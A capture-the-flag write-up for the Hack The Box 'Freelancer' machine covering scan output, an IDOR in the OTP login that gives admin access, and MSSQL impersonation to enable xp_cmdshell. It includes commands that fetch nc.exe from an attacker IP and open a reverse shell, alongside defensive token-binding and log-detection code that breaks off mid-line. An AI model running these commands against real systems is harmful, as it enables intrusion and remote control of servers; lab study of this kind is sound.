# Freelancer

## User Flag

### Enumeration

Initial recon always starts with port scanning, and if an HTTP port is open we can run dirsearch against it.

```bash
naabu --host 10.129.57.150 -v -p - -nmap-cli 'nmap -sV' -o 10.129.57.150.port

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/

		projectdiscovery.io

[INF] Current naabu version 2.3.1 (latest)
[INF] Running CONNECT scan with non root privileges
10.129.57.150:49671
10.129.57.150:49667
10.129.57.150:3268
10.129.57.150:53
10.129.57.150:52941
10.129.57.150:9389
10.129.57.150:5985
10.129.57.150:636
10.129.57.150:3269
10.129.57.150:593
10.129.57.150:49670
10.129.57.150:135
10.129.57.150:49672
10.129.57.150:139
10.129.57.150:445
10.129.57.150:80
10.129.57.150:88
10.129.57.150:52945
10.129.57.150:389
10.129.57.150:55820
10.129.57.150:55824
[INF] Found 21 ports on host 10.129.57.150 (10.129.57.150)
[INF] Running nmap command: nmap -sV -p 55820,636,49670,139,49671,3268,135,52945,55824,9389,593,5985,3269,389,445,88,52941,49667,49672,53,80 10.129.57.150
Starting Nmap 7.95 ( https://nmap.org ) at 2024-06-02 20:44 WIB
Nmap scan report for freelancer.htb (10.129.57.150)
Host is up (0.30s latency).

PORT      STATE    SERVICE       VERSION
53/tcp    open     domain        Simple DNS Plus
80/tcp    open     http          nginx 1.25.5
88/tcp    open     kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-02 18:44:16Z)
135/tcp   open     msrpc         Microsoft Windows RPC
139/tcp   open     netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open     ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
445/tcp   open     microsoft-ds?
593/tcp   open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open     tcpwrapped
3268/tcp  open     ldap          Microsoft Windows Active Directory LDAP (Domain: freelancer.htb0., Site: Default-First-Site-Name)
3269/tcp  open     tcpwrapped
5985/tcp  open     http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open     mc-nmf        .NET Message Framing
49667/tcp open     msrpc         Microsoft Windows RPC
49670/tcp open     ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open     msrpc         Microsoft Windows RPC
49672/tcp open     msrpc         Microsoft Windows RPC
52941/tcp filtered unknown
52945/tcp filtered unknown
55820/tcp open     msrpc         Microsoft Windows RPC
55824/tcp open     msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.38 seconds
```

dirsearch results against port 80:

```bash
dirsearch -u http://freelancer.htb
/usr/share/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11723

Output: /home/replican/Desktop/Prod/HackTheBox/machine/Freelancer/reports/http_freelancer.htb/__24-06-02_21-13-58.txt

Target: http://freelancer.htb/

[21:13:58] Starting:
[21:14:44] 400 -  157B  - /\..\..\..\..\..\..\..\..\..\etc\passwd
[21:14:48] 301 -    0B  - /about  ->  /about/
[21:14:51] 301 -    0B  - /accounts/login  ->  /accounts/login/
[21:14:55] 301 -    0B  - /admin  ->  /admin/
[21:14:58] 302 -    0B  - /admin/  ->  /admin/login/?next=/admin/
[21:14:58] 302 -    0B  - /admin/%3bindex/  ->  /admin/login/?next=/admin/%253Bindex/
[21:14:58] 302 -    0B  - /admin/.config  ->  /admin/login/?next=/admin/.config
[21:14:58] 302 -    0B  - /admin/.htaccess  ->  /admin/login/?next=/admin/.htaccess
[21:14:58] 302 -    0B  - /admin/_logs/access-log  ->  /admin/login/?next=/admin/_logs/access-log
[21:14:58] 302 -    0B  - /admin/_logs/access.log  ->  /admin/login/?next=/admin/_logs/access.log
[21:14:58] 302 -    0B  - /admin/_logs/access_log  ->  /admin/login/?next=/admin/_logs/access_log
[21:14:58] 302 -    0B  - /admin/_logs/err.log  ->  /admin/login/?next=/admin/_logs/err.log
[21:14:58] 302 -    0B  - /admin/_logs/error.log  ->  /admin/login/?next=/admin/_logs/error.log
[21:14:58] 302 -    0B  - /admin/_logs/error-log  ->  /admin/login/?next=/admin/_logs/error-log
[21:14:58] 302 -    0B  - /admin/_logs/error_log  ->  /admin/login/?next=/admin/_logs/error_log
[21:14:58] 302 -    0B  - /admin/access.log  ->  /admin/login/?next=/admin/access.log
[21:14:58] 302 -    0B  - /admin/access_log  ->  /admin/login/?next=/admin/access_log
[21:14:58] 302 -    0B  - /admin/access.txt  ->  /admin/login/?next=/admin/access.txt
[21:14:58] 302 -    0B  - /admin/account  ->  /admin/login/?next=/admin/account
[21:14:58] 302 -    0B  - /admin/account.aspx  ->  /admin/login/?next=/admin/account.aspx
[21:14:58] 302 -    0B  - /admin/account.php  ->  /admin/login/?next=/admin/account.php
[21:14:58] 302 -    0B  - /admin/account.jsp  ->  /admin/login/?next=/admin/account.jsp
[21:14:58] 302 -    0B  - /admin/account.js  ->  /admin/login/?next=/admin/account.js
[21:14:58] 302 -    0B  - /admin/_logs/login.txt  ->  /admin/login/?next=/admin/_logs/login.txt
[21:14:58] 302 -    0B  - /admin/admin-login  ->  /admin/login/?next=/admin/admin-login
[21:14:58] 302 -    0B  - /admin/admin-login.php  ->  /admin/login/?next=/admin/admin-login.php
[21:14:58] 302 -    0B  - /admin/admin-login.aspx  ->  /admin/login/?next=/admin/admin-login.aspx
[21:14:58] 302 -    0B  - /admin/account.html  ->  /admin/login/?next=/admin/account.html
[21:14:59] 302 -    0B  - /admin/admin-login.jsp  ->  /admin/login/?next=/admin/admin-login.jsp
[21:14:58] 302 -    0B  - /admin/admin  ->  /admin/login/?next=/admin/admin
[21:14:59] 302 -    0B  - /admin/admin-login.html  ->  /admin/login/?next=/admin/admin-login.html
[21:14:59] 302 -    0B  - /admin/admin-login.js  ->  /admin/login/?next=/admin/admin-login.js
[21:14:59] 302 -    0B  - /admin/admin.php  ->  /admin/login/?next=/admin/admin.php
[21:14:59] 302 -    0B  - /admin/admin.jsp  ->  /admin/login/?next=/admin/admin.jsp
[21:14:59] 302 -    0B  - /admin/admin.html  ->  /admin/login/?next=/admin/admin.html
[21:14:59] 302 -    0B  - /admin/admin.js  ->  /admin/login/?next=/admin/admin.js
[21:14:59] 302 -    0B  - /admin/admin.aspx  ->  /admin/login/?next=/admin/admin.aspx
[21:14:59] 302 -    0B  - /admin/admin/login  ->  /admin/login/?next=/admin/admin/login
[21:14:59] 302 -    0B  - /admin/admin_login  ->  /admin/login/?next=/admin/admin_login
[21:14:59] 302 -    0B  - /admin/admin_login.aspx  ->  /admin/login/?next=/admin/admin_login.aspx
[21:14:59] 302 -    0B  - /admin/admin_login.php  ->  /admin/login/?next=/admin/admin_login.php
[21:14:59] 302 -    0B  - /admin/admin_login.html  ->  /admin/login/?next=/admin/admin_login.html
[21:14:59] 302 -    0B  - /admin/adminLogin  ->  /admin/login/?next=/admin/adminLogin
[21:14:59] 302 -    0B  - /admin/admin_login.js  ->  /admin/login/?next=/admin/admin_login.js
[21:14:59] 302 -    0B  - /admin/admin_login.jsp  ->  /admin/login/?next=/admin/admin_login.jsp
[21:14:59] 302 -    0B  - /admin/adminLogin.php  ->  /admin/login/?next=/admin/adminLogin.php
[21:15:00] 302 -    0B  - /admin/adminLogin.aspx  ->  /admin/login/?next=/admin/adminLogin.aspx
[21:14:59] 302 -    0B  - /admin/adminer.php  ->  /admin/login/?next=/admin/adminer.php
[21:15:00] 302 -    0B  - /admin/backup/  ->  /admin/login/?next=/admin/backup/
[21:15:00] 302 -    0B  - /admin/adminLogin.js  ->  /admin/login/?next=/admin/adminLogin.js
[21:15:00] 302 -    0B  - /admin/adminLogin.html  ->  /admin/login/?next=/admin/adminLogin.html
[21:15:00] 302 -    0B  - /admin/backups/  ->  /admin/login/?next=/admin/backups/
[21:15:00] 302 -    0B  - /admin/controlpanel  ->  /admin/login/?next=/admin/controlpanel
[21:14:59] 302 -    0B  - /admin/adminLogin.jsp  ->  /admin/login/?next=/admin/adminLogin.jsp
[21:15:00] 302 -    0B  - /admin/config.php  ->  /admin/login/?next=/admin/config.php
[21:15:00] 302 -    0B  - /admin/controlpanel.php  ->  /admin/login/?next=/admin/controlpanel.php
[21:15:00] 302 -    0B  - /admin/controlpanel.aspx  ->  /admin/login/?next=/admin/controlpanel.aspx
[21:15:00] 302 -    0B  - /admin/controlpanel.jsp  ->  /admin/login/?next=/admin/controlpanel.jsp
[21:15:00] 302 -    0B  - /admin/cp.php  ->  /admin/login/?next=/admin/cp.php
[21:15:00] 302 -    0B  - /admin/controlpanel.js  ->  /admin/login/?next=/admin/controlpanel.js
[21:15:00] 302 -    0B  - /admin/cp  ->  /admin/login/?next=/admin/cp
[21:15:00] 302 -    0B  - /admin/cp.aspx  ->  /admin/login/?next=/admin/cp.aspx
[21:15:00] 302 -    0B  - /admin/cp.jsp  ->  /admin/login/?next=/admin/cp.jsp
[21:15:00] 302 -    0B  - /admin/controlpanel.html  ->  /admin/login/?next=/admin/controlpanel.html
[21:15:00] 302 -    0B  - /admin/cp.html  ->  /admin/login/?next=/admin/cp.html
[21:15:00] 302 -    0B  - /admin/cp.js  ->  /admin/login/?next=/admin/cp.js
[21:15:00] 302 -    0B  - /admin/data/autosuggest  ->  /admin/login/?next=/admin/data/autosuggest
[21:15:00] 302 -    0B  - /admin/db/  ->  /admin/login/?next=/admin/db/
[21:15:00] 302 -    0B  - /admin/default  ->  /admin/login/?next=/admin/default
[21:15:00] 302 -    0B  - /admin/default.asp  ->  /admin/login/?next=/admin/default.asp
[21:15:01] 302 -    0B  - /admin/default/admin.asp  ->  /admin/login/?next=/admin/default/admin.asp
[21:15:01] 302 -    0B  - /admin/default/login.asp  ->  /admin/login/?next=/admin/default/login.asp
[21:15:01] 302 -    0B  - /admin/download.php  ->  /admin/login/?next=/admin/download.php
[21:15:01] 302 -    0B  - /admin/dumper/  ->  /admin/login/?next=/admin/dumper/
[21:15:01] 302 -    0B  - /admin/error.log  ->  /admin/login/?next=/admin/error.log
[21:15:01] 302 -    0B  - /admin/error.txt  ->  /admin/login/?next=/admin/error.txt
[21:15:01] 302 -    0B  - /admin/error_log  ->  /admin/login/?next=/admin/error_log
[21:15:01] 302 -    0B  - /admin/FCKeditor  ->  /admin/login/?next=/admin/FCKeditor
[21:15:01] 302 -    0B  - /admin/errors.log  ->  /admin/login/?next=/admin/errors.log
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx
[21:15:01] 302 -    0B  - /admin/export.php  ->  /admin/login/?next=/admin/export.php
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/asp/upload.asp  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/asp/upload.asp
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/asp/connector.asp  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/asp/connector.asp
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/aspx/upload.aspx
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/php/connector.php  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/php/connector.php
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/connectors/php/upload.php  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/connectors/php/upload.php
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/aspx/upload.aspx
[21:15:01] 302 -    0B  - /admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/browser/default/connectors/asp/connector.asp
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/upload/asp/upload.asp  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/asp/upload.asp
[21:15:02] 302 -    0B  - /admin/fckeditor/editor/filemanager/upload/php/upload.php  ->  /admin/login/?next=/admin/fckeditor/editor/filemanager/upload/php/upload.php
[21:15:02] 302 -    0B  - /admin/file.php  ->  /admin/login/?next=/admin/file.php
[21:15:02] 302 -    0B  - /admin/files.php  ->  /admin/login/?next=/admin/files.php
[21:15:02] 302 -    0B  - /admin/heapdump  ->  /admin/login/?next=/admin/heapdump
[21:15:02] 302 -    0B  - /admin/home  ->  /admin/login/?next=/admin/home
[21:15:02] 302 -    0B  - /admin/home.php  ->  /admin/login/?next=/admin/home.php
[21:15:02] 302 -    0B  - /admin/home.jsp  ->  /admin/login/?next=/admin/home.jsp
[21:15:02] 302 -    0B  - /admin/home.aspx  ->  /admin/login/?next=/admin/home.aspx
[21:15:02] 302 -    0B  - /admin/home.js  ->  /admin/login/?next=/admin/home.js
[21:15:02] 302 -    0B  - /admin/index  ->  /admin/login/?next=/admin/index
[21:15:02] 302 -    0B  - /admin/home.html  ->  /admin/login/?next=/admin/home.html
[21:15:02] 302 -    0B  - /admin/index.aspx  ->  /admin/login/?next=/admin/index.aspx
[21:15:02] 302 -    0B  - /admin/index.jsp  ->  /admin/login/?next=/admin/index.jsp
[21:15:02] 302 -    0B  - /admin/index.php  ->  /admin/login/?next=/admin/index.php
[21:15:02] 302 -    0B  - /admin/includes/configure.php~  ->  /admin/login/?next=/admin/includes/configure.php~
[21:15:02] 302 -    0B  - /admin/index.html  ->  /admin/login/?next=/admin/index.html
[21:15:02] 302 -    0B  - /admin/js/tiny_mce  ->  /admin/login/?next=/admin/js/tiny_mce
[21:15:02] 302 -    0B  - /admin/index.js  ->  /admin/login/?next=/admin/index.js
[21:15:02] 302 -    0B  - /admin/js/tiny_mce/  ->  /admin/login/?next=/admin/js/tiny_mce/
[21:15:02] 302 -    0B  - /admin/js/tinymce  ->  /admin/login/?next=/admin/js/tinymce
[21:15:03] 302 -    0B  - /admin/js/tinymce/  ->  /admin/login/?next=/admin/js/tinymce/
[21:15:03] 302 -    0B  - /admin/log  ->  /admin/login/?next=/admin/log
[21:15:03] 302 -    0B  - /admin/login  ->  /admin/login/?next=/admin/login
[21:15:03] 302 -    0B  - /admin/log/error.log  ->  /admin/login/?next=/admin/log/error.log
[21:15:03] 302 -    0B  - /admin/login.aspx  ->  /admin/login/?next=/admin/login.aspx
[21:15:03] 302 -    0B  - /admin/login.php  ->  /admin/login/?next=/admin/login.php
[21:15:03] 302 -    0B  - /admin/login.jsp  ->  /admin/login/?next=/admin/login.jsp
[21:15:03] 302 -    0B  - /admin/login.html  ->  /admin/login/?next=/admin/login.html
[21:15:03] 302 -    0B  - /admin/login.js  ->  /admin/login/?next=/admin/login.js
[21:15:03] 302 -    0B  - /admin/login.asp  ->  /admin/login/?next=/admin/login.asp
[21:15:04] 302 -    0B  - /admin/login.do  ->  /admin/login/?next=/admin/login.do
[21:15:04] 302 -    0B  - /admin/login.py  ->  /admin/login/?next=/admin/login.py
[21:15:04] 302 -    0B  - /admin/login.htm  ->  /admin/login/?next=/admin/login.htm
[21:15:04] 302 -    0B  - /admin/login.rb  ->  /admin/login/?next=/admin/login.rb
[21:15:04] 302 -    0B  - /admin/logon  ->  /admin/login/?next=/admin/logon
[21:15:04] 302 -    0B  - /admin/logon.jsp  ->  /admin/login/?next=/admin/logon.jsp
[21:15:04] 302 -    0B  - /admin/logon.aspx  ->  /admin/login/?next=/admin/logon.aspx
[21:15:04] 302 -    0B  - /admin/logon.html  ->  /admin/login/?next=/admin/logon.html
[21:15:04] 302 -    0B  - /admin/logs/access-log  ->  /admin/login/?next=/admin/logs/access-log
[21:15:04] 302 -    0B  - /admin/logs/err.log  ->  /admin/login/?next=/admin/logs/err.log
[21:15:04] 302 -    0B  - /admin/logs/access.log  ->  /admin/login/?next=/admin/logs/access.log
[21:15:04] 302 -    0B  - /admin/logs/access_log  ->  /admin/login/?next=/admin/logs/access_log
[21:15:04] 302 -    0B  - /admin/logon.php  ->  /admin/login/?next=/admin/logon.php
[21:15:04] 302 -    0B  - /admin/logs/error-log  ->  /admin/login/?next=/admin/logs/error-log
[21:15:04] 302 -    0B  - /admin/logon.js  ->  /admin/login/?next=/admin/logon.js
[21:15:04] 302 -    0B  - /admin/logs/  ->  /admin/login/?next=/admin/logs/
[21:15:04] 302 -    0B  - /admin/logs/error.log  ->  /admin/login/?next=/admin/logs/error.log
[21:15:04] 302 -    0B  - /admin/logs/error_log  ->  /admin/login/?next=/admin/logs/error_log
[21:15:04] 302 -    0B  - /admin/logs/errors.log  ->  /admin/login/?next=/admin/logs/errors.log
[21:15:04] 302 -    0B  - /admin/logs/login.txt  ->  /admin/login/?next=/admin/logs/login.txt
[21:15:04] 302 -    0B  - /admin/manage.asp  ->  /admin/login/?next=/admin/manage.asp
[21:15:04] 302 -    0B  - /admin/manage/admin.asp  ->  /admin/login/?next=/admin/manage/admin.asp
[21:15:04] 302 -    0B  - /admin/manage  ->  /admin/login/?next=/admin/manage
[21:15:05] 302 -    0B  - /admin/manage/login.asp  ->  /admin/login/?next=/admin/manage/login.asp
[21:15:05] 302 -    0B  - /admin/mysql/index.php  ->  /admin/login/?next=/admin/mysql/index.php
[21:15:05] 302 -    0B  - /admin/mysql/  ->  /admin/login/?next=/admin/mysql/
[21:15:05] 302 -    0B  - /admin/mysql2/index.php  ->  /admin/login/?next=/admin/mysql2/index.php
[21:15:05] 302 -    0B  - /admin/phpMyAdmin  ->  /admin/login/?next=/admin/phpMyAdmin
[21:15:05] 302 -    0B  - /admin/phpMyAdmin/  ->  /admin/login/?next=/admin/phpMyAdmin/
[21:15:05] 302 -    0B  - /admin/phpmyadmin/  ->  /admin/login/?next=/admin/phpmyadmin/
[21:15:05] 302 -    0B  - /admin/pMA/  ->  /admin/login/?next=/admin/pMA/
[21:15:05] 302 -    0B  - /admin/phpMyAdmin/index.php  ->  /admin/login/?next=/admin/phpMyAdmin/index.php
[21:15:05] 302 -    0B  - /admin/pma/  ->  /admin/login/?next=/admin/pma/
[21:15:05] 302 -    0B  - /admin/phpmyadmin2/index.php  ->  /admin/login/?next=/admin/phpmyadmin2/index.php
[21:15:05] 302 -    0B  - /admin/pma/index.php  ->  /admin/login/?next=/admin/pma/index.php
[21:15:05] 302 -    0B  - /admin/PMA/index.php  ->  /admin/login/?next=/admin/PMA/index.php
[21:15:05] 302 -    0B  - /admin/pol_log.txt  ->  /admin/login/?next=/admin/pol_log.txt
[21:15:05] 302 -    0B  - /admin/phpmyadmin/index.php  ->  /admin/login/?next=/admin/phpmyadmin/index.php
[21:15:06] 302 -    0B  - /admin/release  ->  /admin/login/?next=/admin/release
[21:15:06] 302 -    0B  - /admin/private/logs  ->  /admin/login/?next=/admin/private/logs
[21:15:06] 302 -    0B  - /admin/scripts/fckeditor  ->  /admin/login/?next=/admin/scripts/fckeditor
[21:15:06] 302 -    0B  - /admin/secure/logon.jsp  ->  /admin/login/?next=/admin/secure/logon.jsp
[21:15:06] 302 -    0B  - /admin/sqladmin/  ->  /admin/login/?next=/admin/sqladmin/
[21:15:06] 302 -    0B  - /admin/portalcollect.php?f=http://xxx&t=js  ->  /admin/login/?next=/admin/portalcollect.php%3Ff%3Dhttp%3A//xxx%26t%3Djs
[21:15:06] 302 -    0B  - /admin/sxd/  ->  /admin/login/?next=/admin/sxd/
[21:15:06] 302 -    0B  - /admin/sysadmin/  ->  /admin/login/?next=/admin/sysadmin/
[21:15:06] 302 -    0B  - /admin/tinymce  ->  /admin/login/?next=/admin/tinymce
[21:15:06] 302 -    0B  - /admin/upload.php  ->  /admin/login/?next=/admin/upload.php
[21:15:06] 302 -    0B  - /admin/uploads.php  ->  /admin/login/?next=/admin/uploads.php
[21:15:06] 302 -    0B  - /admin/signin  ->  /admin/login/?next=/admin/signin
[21:15:06] 302 -    0B  - /admin/user_count.txt  ->  /admin/login/?next=/admin/user_count.txt
[21:15:06] 302 -    0B  - /admin/views/ajax/autocomplete/user/a  ->  /admin/login/?next=/admin/views/ajax/autocomplete/user/a
[21:15:06] 302 -    0B  - /admin/web/  ->  /admin/login/?next=/admin/web/
[21:15:06] 302 -    0B  - /admin/tiny_mce  ->  /admin/login/?next=/admin/tiny_mce
[21:15:53] 301 -    0B  - /blog  ->  /blog/
[21:15:54] 200 -   19KB - /blog/
[21:16:07] 301 -    0B  - /contact  ->  /contact/
[21:16:46] 400 -  157B  - /index.php::$DATA
[21:18:00] 404 -  555B  - /static/api/swagger.json
[21:18:00] 404 -  555B  - /static/api/swagger.yaml
[21:18:00] 404 -  555B  - /static/dump.sql
[21:18:12] 400 -  157B  - /Trace.axd::$DATA
[21:18:24] 400 -  157B  - /web.config::$DATA

Task Completed
```

Port 80 is open, so let's go straight to testing it. There is an IDOR bug in the account validation flow: when we register as an employer the account cannot be used yet because it still has to be validated. So we go directly to

{% embed url="http://freelancer.htb/accounts/recovery/" %}

Access it with a freelancer account (register one if you don't have it yet),

enter the username of the employer account you want to activate,

and once the security questions are answered the same way you registered them earlier, the employer account will be activated.

<figure><img src="https://945112445-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbrxXzY5PMGua4UW86ukK%2Fuploads%2FpuoPD5ABxw9BBGNWxRnM%2Fimage.png?alt=media&#x26;token=ae0533b9-3d3d-4cc4-844a-8c2c44562c11" alt=""><figcaption></figcaption></figure>

There is a QR code feature, and when we scan the QR code

<figure><img src="https://945112445-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbrxXzY5PMGua4UW86ukK%2Fuploads%2FhAvBcLJ6UEDTWxIgaIx0%2Fimage.png?alt=media&#x26;token=758912c8-f12d-483e-a73f-907e857df4c7" alt=""><figcaption></figcaption></figure>

it contains a base64 string, MTAwMTE, which decodes to 10011, which looks like a user ID. Here I tried replacing it with 2 in base64.

example: <http://freelancer.htb/accounts/login/otp/MTAwMTE=/f41c9032a6f7c2c50ec62b7ef8b31d16/>

becomes: <http://freelancer.htb/accounts/login/otp/Mgo=/f41c9032a6f7c2c50ec62b7ef8b31d16/>

<figure><img src="https://945112445-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbrxXzY5PMGua4UW86ukK%2Fuploads%2Fq3wroAvWt4pBC8rM77Wn%2Fimage.png?alt=media&#x26;token=43664bd2-9b45-4b61-961b-07f294f1e9b3" alt=""><figcaption></figcaption></figure>

And yep, we are admin now. As the dirsearch scan above showed, there is an /admin path, so we go straight there.
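The reason swapping MTAwMTE= for Mgo= works is that the second path segment is a token the server accepts without tying it to the user id in front of it. As an added example that is not part of this writeup or of the Freelancer application, the following Python sketch contrasts that unbound pattern with a login link whose token is an HMAC over the user id and an expiry, so editing the id invalidates the token. SERVER_SECRET, the ISSUED_TOKENS store and the route layout are constructed for the example; the ids 10011 and 2 are the ones from the walkthrough.

```python
import base64
import hashlib
import hmac
import secrets
import time
from typing import Optional, Tuple

# Constructed secret for this example only; a real service loads it from configuration.
SERVER_SECRET = b"example-only-secret-do-not-reuse"
LINK_PREFIX = "/accounts/login/otp/"   # route layout assumed from the URLs in the writeup


def _enc_id(user_id: int) -> str:
    return base64.b64encode(str(user_id).encode()).decode()


def _split(path: str) -> Tuple[str, str]:
    """Return (encoded id, token) from a link shaped like LINK_PREFIX<id>/<token>/."""
    parts = path.strip("/").split("/")
    if len(parts) < 2:
        return "", ""
    return parts[-2], parts[-1]


def swap_id(path: str, new_id: int) -> str:
    """What the walkthrough does by hand: keep the token, replace the id segment."""
    parts = path.strip("/").split("/")
    parts[-2] = _enc_id(new_id)
    return "/" + "/".join(parts) + "/"


# --- unbound pattern: the token is random and stored on its own ----------------------

ISSUED_TOKENS = set()   # server-side record; note it never stores which user a token is for


def issue_unbound(user_id: int) -> str:
    token = secrets.token_hex(16)
    ISSUED_TOKENS.add(token)
    return f"{LINK_PREFIX}{_enc_id(user_id)}/{token}/"


def verify_unbound(path: str) -> Optional[int]:
    """Accepts any known token and trusts the id from the URL: this is the IDOR."""
    enc_id, token = _split(path)
    if token not in ISSUED_TOKENS:
        return None
    try:
        return int(base64.b64decode(enc_id))
    except ValueError:          # binascii.Error is a ValueError subclass
        return None


# --- bound pattern: token = expiry + HMAC(secret, "user_id:expiry") -------------------

def _tag(user_id: int, expires: int) -> str:
    msg = f"{user_id}:{expires}".encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def issue_bound(user_id: int, ttl: int = 600, now: Optional[int] = None) -> str:
    now = int(time.time()) if now is None else now
    expires = now + ttl
    return f"{LINK_PREFIX}{_enc_id(user_id)}/{expires}.{_tag(user_id, expires)}/"


def verify_bound(path: str, now: Optional[int] = None) -> Optional[int]:
    """Returns the user id only if the tag matches that exact id and the link is unexpired."""
    now = int(time.time()) if now is None else now
    enc_id, token = _split(path)
    try:
        user_id = int(base64.b64decode(enc_id))
        expires_str, tag = token.split(".", 1)
        expires = int(expires_str)
    except ValueError:
        return None
    if now > expires:
        return None
    if not hmac.compare_digest(_tag(user_id, expires), tag):
        return None
    return user_id


if __name__ == "__main__":
    employer, admin = 10011, 2      # ids taken from the writeup
    print("unbound, tampered ->", verify_unbound(swap_id(issue_unbound(employer), admin)))
    link = issue_bound(employer)
    print("bound, untampered ->", verify_bound(link))
    print("bound, tampered   ->", verify_bound(swap_id(link, admin)))
```

A stateful fix works just as well: store `token -> user_id` server-side and ignore the id in the path entirely. Either way the token must also be single-use, which the sketch above leaves out for brevity.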

<figure><img src="https://945112445-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbrxXzY5PMGua4UW86ukK%2Fuploads%2F0EMziROMfYrJi5a6Q7N2%2Fimage.png?alt=media&#x26;token=92a60c70-66f6-4d55-b831-85f0e4b1e911" alt=""><figcaption></figcaption></figure>

When I tried `show tables` it turned out this DB is MSSQL, and our goal here is to spawn xp_cmdshell, since this is Windows too.

### Bypassing sysadmin users

Since we are not sysadmin here and xp_cmdshell is disabled via sp_configure, we need to escalate privileges using the following commands:

```sql
EXECUTE AS LOGIN = 'SA'
EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
```

```sql
-- this turns on advanced options and is needed to configure xp_cmdshell
EXEC sp_configure 'show advanced options', '1'
RECONFIGURE
-- this enables xp_cmdshell
EXEC sp_configure 'xp_cmdshell', '1' 
RECONFIGURE
```

Only after that can we use xp_cmdshell.

<figure><img src="https://945112445-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FbrxXzY5PMGua4UW86ukK%2Fuploads%2F0Bx6I8MgflcbUAxxT01Z%2Fimage.png?alt=media&#x26;token=7b64512d-66fe-4343-917c-048d4aa7b84d" alt=""><figcaption></figcaption></figure>

Let's get a reverse shell straight away. Here I use the nc binary.

```sql
xp_cmdshell 'echo IWR http://10.10.14.88:1337/nc.exe -OutFile %TEMP%\nc.exe | powershell -noprofile'
```

```sql
xp_cmdshell '%TEMP%\nc.exe 10.10.14.88 1338 -e powershell'
```

And yep, we got the reverse shell.

Now let's just dump the SQL user passwords to get a shell as the mikasha user.
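From the defender's side, every step of the chain above (impersonating SA, granting sysadmin, flipping xp_cmdshell on, then running commands through it) is visible in SQL Server Audit or query-logging output. The following Python detector is an added example, not from this writeup; the one-statement-per-line log format and the sample lines are constructed, using the statements shown above, and the rule names, severities and CHAIN order are my own choices.

```python
import re
from typing import Dict, List

# Constructed log format for this example: one statement per line, as a query or
# audit log might record it. The SQL text is the sequence used in the walkthrough above.
SAMPLE_LOG = """\
2024-06-02T21:30:01Z login=Freelancer_webapp_user text=SELECT id, title FROM blog_post WHERE published = 1
2024-06-02T21:31:12Z login=Freelancer_webapp_user text=EXECUTE AS LOGIN = 'SA'
2024-06-02T21:31:12Z login=SA text=EXEC sp_addsrvrolemember 'Freelancer_webapp_user', 'sysadmin'
2024-06-02T21:31:40Z login=Freelancer_webapp_user text=EXEC sp_configure 'show advanced options', '1'
2024-06-02T21:31:40Z login=Freelancer_webapp_user text=RECONFIGURE
2024-06-02T21:31:41Z login=Freelancer_webapp_user text=EXEC sp_configure 'xp_cmdshell', '1'
2024-06-02T21:32:05Z login=Freelancer_webapp_user text=xp_cmdshell 'echo IWR http://10.10.14.88:1337/nc.exe -OutFile %TEMP%\\nc.exe | powershell -noprofile'
2024-06-02T21:33:00Z login=Freelancer_webapp_user text=SELECT COUNT(*) FROM auth_user
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+login=(?P<login>\S+)\s+text=(?P<text>.*)$")

# (rule name, pattern over the statement text, severity)
RULES = [
    ("impersonation", re.compile(r"\bEXECUTE\s+AS\s+LOGIN\b", re.I), "high"),
    ("sysadmin_grant", re.compile(
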